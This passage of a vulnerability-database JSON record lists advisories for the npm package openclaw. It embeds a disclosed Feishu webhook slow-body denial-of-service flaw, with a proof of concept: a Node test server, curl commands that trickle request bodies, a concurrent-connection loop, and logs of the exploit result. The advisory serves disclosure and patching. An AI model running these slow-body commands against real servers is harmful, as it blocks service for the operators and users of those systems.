                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.12"
                }
            ],
            "aliases": [
                "CVE-2026-43526",
                "GHSA-2767-2q9v-9326"
            ],
            "risk_score": 3.8,
            "exploitability": "0.5",
            "weighted_severity": "7.5",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9kgh-wj9w-ykff"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90871?format=api",
            "vulnerability_id": "VCID-9pj9-7b12-jbea",
            "summary": "OpenClaw has incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant)\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n# Advisory Details\n\n**Title**: Incomplete Fix for CVE-2026-32011: Feishu Webhook Pre-Auth Body Parsing DoS (Slow-Body / Slowloris Variant)\n\n**Description**:\n\n### Summary\n\nThe patch for CVE-2026-32011 tightened pre-auth body parsing limits (from 1MB/30s to 64KB/5s) across several webhook handlers. However, the **Feishu extension's webhook handler** was not included in the patch and still accepts request bodies with the old permissive limits (1MB body, 30-second timeout) **before** verifying the webhook signature. An unauthenticated attacker can exhaust server connection resources by sending concurrent slow HTTP POST requests to the Feishu webhook endpoint.\n\n### Details\n\nIn `extensions/feishu/src/monitor.ts`, the webhook HTTP handler uses `installRequestBodyLimitGuard` with permissive limits at lines 276-278:\n\n```typescript\nconst FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024;    // 1MB (line 26)\nconst FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000;         // 30s (line 27)\n\n// ... in monitorWebhook(), line 276-278:\nconst guard = installRequestBodyLimitGuard(req, res, {\n  maxBytes: FEISHU_WEBHOOK_MAX_BODY_BYTES,    // 1MB\n  timeoutMs: FEISHU_WEBHOOK_BODY_TIMEOUT_MS,  // 30s\n  responseFormat: \"text\",\n});\n```\n\nThe body guard is installed at line 276 **before** the request reaches the Lark SDK's `adaptDefault` webhook handler (line 284), which performs signature verification. This means:\n\n1. Any unauthenticated HTTP POST is accepted\n2. The server waits up to 30 seconds for the body to arrive\n3. Each connection can buffer up to 1MB\n4. Authentication only happens after the body is fully read\n\nThe patched handlers (Mattermost, MSTeams, Google Chat, etc.) 
now use tight pre-auth limits:\n```typescript\nconst PREAUTH_MAX_BODY_BYTES = 64 * 1024;     // 64KB\nconst PREAUTH_BODY_TIMEOUT_MS = 5_000;         // 5s\n```\n\nThe Feishu extension was missed because it resides in `extensions/feishu/` (a plugin workspace) rather than in the core `src/` directory.\n\n**Attack chain:**\n```\n[Attacker sends slow HTTP POST to /feishu/events]\n  → Rate limit check: passes (under 120 req/min)\n  → Content-Type check: application/json, passes\n  → installRequestBodyLimitGuard(1MB, 30s): installed\n  → Body trickles at 1 byte/sec for 30 seconds\n  → × 50 concurrent connections = connection exhaustion\n  → Legitimate Feishu webhook deliveries blocked\n```\n\n### PoC\n\n**Prerequisites:** Docker installed.\n\n**Step 1:** Create a minimal test server reproducing the vulnerable body parsing:\n\n```bash\ncat > /tmp/feishu_webhook_server.js << 'EOF'\nconst http = require(\"http\");\nconst VULN_TIMEOUT = 30_000;   // Vulnerable: 30s (same as Feishu handler)\nconst PATCH_TIMEOUT = 5_000;   // Patched: 5s (what it should be)\n\nfunction bodyGuard(req, res, timeoutMs) {\n  let done = false;\n  const timer = setTimeout(() => {\n    if (!done) { done = true; res.statusCode = 408; res.end(\"Request body timeout\"); req.destroy(); }\n  }, timeoutMs);\n  req.on(\"end\", () => { done = true; clearTimeout(timer); });\n  req.on(\"close\", () => { done = true; clearTimeout(timer); });\n}\n\nhttp.createServer((req, res) => {\n  if (req.url === \"/healthz\") { res.end(\"OK\"); return; }\n  if (req.method !== \"POST\") { res.writeHead(405); res.end(); return; }\n  const timeout = req.url === \"/feishu/events\" ? 
VULN_TIMEOUT : PATCH_TIMEOUT;\n  console.log(`[${req.url}] +conn`);\n  bodyGuard(req, res, timeout);\n  res.on(\"finish\", () => console.log(`[${req.url}] -conn`));\n}).listen(3000, () => console.log(\"Listening on :3000\"));\nEOF\nnode /tmp/feishu_webhook_server.js &\nsleep 1\n```\n\n**Step 2:** Verify the vulnerability — slow body holds connection for the full timeout:\n\n```bash\n# Vulnerable endpoint: connection stays open for ~10 seconds (max 30s)\ntime (echo -n '{\"t\":\"'; sleep 10; echo '\"}') | \\\n  curl -s -o /dev/null -w \"status: %{http_code}\\n\" \\\n  -X POST http://localhost:3000/feishu/events \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Content-Length: 65536\" \\\n  --data-binary @- --max-time 35\n\n# Patched endpoint: connection terminated after ~5s\ntime (echo -n '{\"t\":\"'; sleep 10; echo '\"}') | \\\n  curl -s -o /dev/null -w \"status: %{http_code}\\n\" \\\n  -X POST http://localhost:3000/patched/events \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Content-Length: 65536\" \\\n  --data-binary @- --max-time 35\n```\n\n**Step 3:** Batch exploit — 10 concurrent slow connections:\n\n```bash\nfor i in $(seq 1 10); do\n  (echo -n 'A'; sleep 15) | \\\n    curl -s -o /dev/null -X POST http://localhost:3000/feishu/events \\\n    -H \"Content-Type: application/json\" \\\n    -H \"Content-Length: 65536\" \\\n    --data-binary @- --max-time 35 &\ndone\nwait\n```\n\n### Log of Evidence\n\n**Exploit result (vulnerable /feishu/events):**\n```\n=== Feishu Webhook Pre-Auth Slow-Body DoS ===\nTarget: localhost:3000/feishu/events\nConcurrent connections: 10\n\n  [conn-0] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-1] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-2] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-3] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-4] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-5] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-6] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-7] held open 
for 15.0s (15B sent) [SUCCESS]\n  [conn-8] held open for 15.0s (15B sent) [SUCCESS]\n  [conn-9] held open for 15.0s (15B sent) [SUCCESS]\n\n=== Results ===\nConnections held open (SUCCESS): 10/10\n[SUCCESS] Pre-auth slow-body DoS confirmed!\n```\n\n**Control result (patched /patched/events with 5s timeout):**\n```\n=== CONTROL: Patched Webhook Body Limits (64KB/5s) ===\nTarget: localhost:3000/patched/events\n\n  [conn-0] RESET after 8.0s (8B)\n  [conn-1] RESET after 8.0s (8B)\n  ...\n  [conn-9] RESET after 8.0s (8B)\n\nAvg connection hold time: 8.0s (5s timeout + stagger delay)\n```\n\n**Server-side Docker logs confirming the discrepancy:**\n```\n[feishu-vulnerable] +conn (active: 1)\n[feishu-vulnerable] +conn (active: 10)  ← No disconnections during 15s attack\n[patched-control] +conn (active: 20)\n[patched-control] -conn after 5.0s (active: 19)  ← ALL terminated at 5s\n[patched-control] -conn after 5.0s (active: 10)\n```\n\n### Impact\n\nAn unauthenticated attacker can cause a **Denial of Service** against any OpenClaw instance running the Feishu channel in webhook mode. The Feishu webhook endpoint must be publicly accessible for Feishu to deliver webhooks, so the attacker can directly target it.\n\nWith ~50 concurrent slow HTTP connections (each trickling 1 byte/second), the attacker can:\n- Exhaust the server's connection handling capacity for 30 seconds per wave\n- Block legitimate Feishu webhook deliveries (messages not reaching the bot)\n- Consume up to 50MB of memory (50 × 1MB buffer) per attack wave\n\nThe attack is trivial — it only requires sending slow HTTP POST requests. 
No valid Feishu webhook signature or any other credentials are needed.\n\n### Affected products\n- **Ecosystem**: npm\n- **Package name**: openclaw\n- **Affected versions**: <= 2026.2.22\n- **Patched versions**: None\n\n### Severity\n- **Severity**: Medium\n- **Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\n\n### Weaknesses\n- **CWE**: CWE-400: Uncontrolled Resource Consumption\n\n### Occurrences\n\n| Permalink | Description |\n| :--- | :--- |\n| [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L26-L27) | Permissive body limit constants: `FEISHU_WEBHOOK_MAX_BODY_BYTES = 1024 * 1024` (1MB) and `FEISHU_WEBHOOK_BODY_TIMEOUT_MS = 30_000` (30s) — should be 64KB/5s to match the CVE-2026-32011 patch. |\n| [https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280](https://github.com/openclaw/openclaw/blob/main/extensions/feishu/src/monitor.ts#L276-L280) | `installRequestBodyLimitGuard` call in `monitorWebhook()` using the permissive constants — this guard runs before authentication (the Lark SDK handler at line 284). |",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35665",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00113",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29524",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00113",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29454",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00113",
                            "scoring_system": "epss",
                            "scoring_elements": "0.29487",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35665"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:57:19Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-w6m8-cqvj-pg5v"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35665",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35665"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:57:19Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-feishu-webhook-pre-auth-body-parsing"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-w6m8-cqvj-pg5v",
                    "reference_id": "GHSA-w6m8-cqvj-pg5v",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-w6m8-cqvj-pg5v"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg",
                    "reference_id": "GHSA-x4vp-4235-65hg",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x4vp-4235-65hg"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.24",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5dj5-mk23-kyds"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-66nc-bn98-nbas"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-acy1-83py-efhr"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-utv2-tyje-kfht"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vv2u-u7mn-rfe1"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
